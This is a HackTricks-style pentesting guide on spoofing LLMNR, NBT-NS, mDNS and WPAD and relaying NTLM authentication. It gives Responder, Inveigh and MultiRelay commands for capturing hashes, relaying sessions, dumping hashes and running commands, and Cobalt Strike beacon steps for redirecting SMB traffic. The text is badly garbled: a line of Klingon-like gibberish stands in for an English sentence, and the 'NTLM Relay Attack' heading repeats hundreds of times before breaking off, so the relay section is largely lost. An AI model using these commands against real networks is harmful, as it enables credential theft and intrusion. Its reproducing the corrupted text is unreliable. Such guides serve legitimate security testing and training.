hacktricks/generic-methodologies-and-resources/pentesting-network/spoofing-llmnr-nbt-ns-mdns-dns-and-wpad-and-relay-attacks.md
2024-02-10 17:52:19 +00:00

674 lines
20 KiB
Markdown

# Spoofing LLMNR, NBT-NS, mDNS/DNS and WPAD and Relay Attacks
<details>
<summary><strong>Learn AWS hacking from zero to hero with</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
Other ways to support HackTricks:
* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
</details>
## Network Protocols
### Local Host Resolution Protocols
- **LLMNR, NBT-NS, and mDNS**:
- Microsoft and other operating systems use LLMNR and NBT-NS for local name resolution when DNS fails. Similarly, Apple and Linux systems use mDNS.
- These protocols are susceptible to interception and spoofing due to their unauthenticated, broadcast nature over UDP.
- [Responder](https://github.com/lgandx/Responder) can be used to impersonate services by sending forged responses to hosts querying these protocols.
- Further information on service impersonation using Responder can be found [here](spoofing-llmnr-nbt-ns-mdns-dns-and-wpad-and-relay-attacks.md).
### Web Proxy Auto-Discovery Protocol (WPAD)
- WPAD allows browsers to discover proxy settings automatically.
- Discovery is facilitated via DHCP, DNS, or fallback to LLMNR and NBT-NS if DNS fails.
- Responder can automate WPAD attacks, directing clients to malicious WPAD servers.
### Responder for Protocol Poisoning
- **Responder** is a tool used for poisoning LLMNR, NBT-NS, and mDNS queries, selectively responding based on query types, primarily targeting SMB services.
- It comes pre-installed in Kali Linux, configurable at `/etc/responder/Responder.conf`.
- Responder displays captured hashes on the screen and saves them in the `/usr/share/responder/logs` directory.
- It supports both IPv4 and IPv6.
- Windows version of Responder is available [here](https://github.com/lgandx/Responder-Windows).
#### Running Responder
- To run Responder with default settings: `responder -I <Interface>`
- For more aggressive probing (with potential side effects): `responder -I <Interface> -P -r -v`
- Techniques to capture NTLMv1 challenges/responses for easier cracking: `responder -I <Interface> --lm --disable-ess`
- WPAD impersonation can be activated with: `responder -I <Interface> --wpad`
- NetBIOS requests can be resolved to the attacker's IP, and an authentication proxy can be set up: `responder.py -I <interface> -Pv`
### DHCP Poisoning with Responder
- Spoofing DHCP responses can permanently poison a victim's routing information, offering a stealthier alternative to ARP poisoning.
- It requires precise knowledge of the target network's configuration.
- Running the attack: `./Responder.py -I eth0 -Pdv`
- This method can effectively capture NTLMv1/2 hashes, but it requires careful handling to avoid network disruption.
### Capturing Credentials with Responder
- Responder will impersonate services using the above-mentioned protocols, capturing credentials (usually NTLMv2 Challenge/Response) when a user attempts to authenticate against the spoofed services.
- Attempts can be made to downgrade to NetNTLMv1 or disable ESS for easier credential cracking.
It's crucial to note that employing these techniques should be done legally and ethically, ensuring proper authorization and avoiding disruption or unauthorized access.
## Inveigh
Inveigh is a tool for penetration testers and red teamers, designed for Windows systems. It offers functionalities similar to Responder, performing spoofing and man-in-the-middle attacks. The tool has evolved from a PowerShell script to a C# binary, with [**Inveigh**](https://github.com/Kevin-Robertson/Inveigh) and [**InveighZero**](https://github.com/Kevin-Robertson/InveighZero) as the main versions. Detailed parameters and instructions can be found in the [**wiki**](https://github.com/Kevin-Robertson/Inveigh/wiki/Parameters).
Inveigh can be operated through PowerShell:
```powershell
Invoke-Inveigh -NBNS Y -ConsoleOutput Y -FileOutput Y
```
Or executed as a C# binary:
```
'ejDI'eghDI' 'e' vItlhutlh C# binary:
```
```bash
Inveigh.exe
```
### NTLM Relay Attack
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack
```bash
Cobalt Strike -> Script Manager -> Load (Select PortBender.cna)
beacon> cd C:\Windows\system32\drivers # Navigate to drivers directory
beacon> upload C:\PortBender\WinDivert64.sys # Upload driver
beacon> PortBender redirect 445 8445 # Redirect traffic from port 445 to 8445
beacon> rportfwd 8445 127.0.0.1 445 # Route traffic from port 8445 to Team Server
beacon> socks 1080 # Establish a SOCKS proxy on port 1080
# Termination commands
beacon> jobs
beacon> jobkill 0
beacon> rportfwd stop 8445
beacon> socks stop
```
### NTLM Relay Attack-ghom
- **Metasploit**: Set up with proxies, local and remote host details.
- **smbrelayx**: A Python script for relaying SMB sessions and executing commands or deploying backdoors.
- **MultiRelay**: A tool from the Responder suite to relay specific users or all users, execute commands, or dump hashes.
Each tool can be configured to operate through a SOCKS proxy if necessary, enabling attacks even with indirect network access.
### MultiRelay Operation-ghom
MultiRelay is executed from the _**/usr/share/responder/tools**_ directory, targeting specific IPs or users.
```bash
python MultiRelay.py -t <IP target> -u ALL # Relay all users
python MultiRelay.py -t <IP target> -u ALL -c whoami # Execute command
python MultiRelay.py -t <IP target> -u ALL -d # Dump hashes
# Proxychains for routing traffic
```
### Force NTLM Logins
In Windows you **may be able to force some privileged accounts to authenticate to arbitrary machines**. Read the following page to learn how:
{% content-ref url="../../windows-hardening/active-directory-methodology/printers-spooler-service-abuse.md" %}
[printers-spooler-service-abuse.md](../../windows-hardening/active-directory-methodology/printers-spooler-service-abuse.md)
{% endcontent-ref %}
## References
* [https://intrinium.com/smb-relay-attack-tutorial/](https://intrinium.com/smb-relay-attack-tutorial/)
* [https://www.4armed.com/blog/llmnr-nbtns-poisoning-using-responder/](https://www.4armed.com/blog/llmnr-nbtns-poisoning-using-responder/)
* [https://www.notsosecure.com/pwning-with-responder-a-pentesters-guide/](https://www.notsosecure.com/pwning-with-responder-a-pentesters-guide/)
* [https://intrinium.com/smb-relay-attack-tutorial/](https://intrinium.com/smb-relay-attack-tutorial/)
* [https://byt3bl33d3r.github.io/practical-guide-to-ntlm-relaying-in-2017-aka-getting-a-foothold-in-under-5-minutes.html](https://byt3bl33d3r.github.io/practical-guide-to-ntlm-relaying-in-2017-aka-getting-a-foothold-in-under-5-minutes.html)
<details>
<summary><strong>Learn AWS hacking from zero to hero with</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
Other ways to support HackTricks:
* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
</details>